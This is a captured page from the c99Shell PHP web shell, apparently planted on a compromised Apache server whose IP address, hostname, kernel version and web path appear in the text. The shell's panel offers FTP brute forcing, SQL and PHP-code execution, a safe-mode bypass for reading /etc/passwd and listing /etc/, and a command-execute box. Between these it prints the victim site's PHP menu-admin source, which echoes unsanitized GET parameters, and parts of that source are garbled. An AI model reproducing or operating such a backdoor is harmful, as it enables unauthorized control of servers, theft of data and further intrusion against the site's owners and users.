110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?
$MnStID=$_GET['MnStID'];
$Level=$_GET['Level'];
$ParentMnID=$_GET['ParentMnID'];
include_once("pagebody.php");
pageHeader();
$pageTitle="аѕФиБаБ№ЩГРєє§Т№";        // $StID";
?>
<table width=100% class="pageTitleBgColor" align="center">
<tr><td align=center><? echo $pageTitle; ?></td></tr>
</table>
<!--your code here-------------------------------------------------------------------------->
<p>
<?
include_once("clsUmSystem.php");
include_once("clsUmMenu.php");
include_once("clsUmGroup.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oSt = new umSystem($oC);
    $oSt->SearchByKey($MnStID);
    $oSt->GetRecord();
    $StName = $oSt->StNameT;
    $oSt->Close();
$oMn = new umMenu($oC);
    $oMn->SearchByKey($MnID);
    $oMn->GetRecord();
?>
<form name="form1" method=post action="processUmMenu.php">
<table border="0" align="center" cellspacing="1" class="TableBodyBgColor">
<tr class="TableRowBgColor">
    <td>&nbsp;</td>    
    <td>    <input type="hidden" name="method" value="add">
            <input type="hidden" name="MnStID" value="<?=$MnStID;?>">
            <input type="hidden" name="MnSeq" value="1">
            <input type="hidden" name="MnParentMnID" value="<?=$ParentMnID;?>">
            <input type="hidden" name="MnLevel" value="<?=$Level;?>">
    </td>
    </tr>
<tr class="TableRowBgColor">
    <td>ЛСЗўйНаБ№Щ(·)</td>
    <td><input type="text" name="MnNameT" size="40"></td>
    </tr>
<tr class="TableRowBgColor">
    <td>ЛСЗўйНаБ№Щ(E)</td>
    <td><input type="text" name="MnNameE" size="40"></td>
    </tr>
<tr class="TableRowBgColor">
    <td>URL</td>
    <td><input type="text" name="MnURL" size="40"></td>
    </tr>
<tr class="TableRowBgColor">
    <td>¤УНёФєТВ</td>
    <td><textarea name="MnDesc" rows="3" cols=40></textarea></td>
    </tr>
<tr class="TableRowBgColor">
    <td>ЎЕШиБГРєє§Т№</td>
    <td><select name="MnIcon">
        <option value="">НЧи№ж</option>
<?php
        $oGp1 = new umGroup($oC);
        $oGp2 = new umGroup($oC);
        
        $oGp1->RSumgroupByStIDGroupMnIcon();
        while($oGp1->GetRecord()) {
            $oGp2->SearchByKey($oGp1->GpID);
            $oGp2->GetRecord();
?>
        <option value="<?php echo $oGp1->GpID;?>"><?php echo $oGp2->GpNameT;?></option>
<?php
        }
?>
    </select></td>
    </tr>
 <tr class="TableRowBgColor">
    <td>&nbsp;</td>    
    <td><input type="button" value="єС№·ЦЎ" onclick="doValidate(document.form1);"></td>
    </tr> 
 </table>
 </form>
 <br>
<!--------------------------------------------------------------------->
<? 
pageFooter(); 
?>
<!--------------------------------------------------------------------->
<!--put javascript here-->
<script language="javascript">
function doValidate(f){
    if (IsEmpty(f.MnNameT, "ЎГШіТ»йН№ ЛСЗўйНаБ№Щ(·)")) return 0;
    if (IsEmpty(f.MnNameE, "ЎГШіТ»йН№ ЛСЗўйНаБ№Щ(E)")) return 0;
//    if (IsEmpty(f.MnURL, "ЎГШіТ»йН№ URL")) return 0;
//    if (IsEmpty(f.StAbbrE, "ЎГШіТ»йН№ ЄЧиНВиНГРєє Н")) return 0;
//    if (IsEmpty(f.StDesc, "ЎГШіТ»йН№ ¤УНёФєТВ")) return 0;
//    if (IsEmpty(f.StURL, "ЎГШіТ»йН№ URL Л№йТбГЎ")) return 0;
    f.submit();
}
//document.form1.login.focus();
</script>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: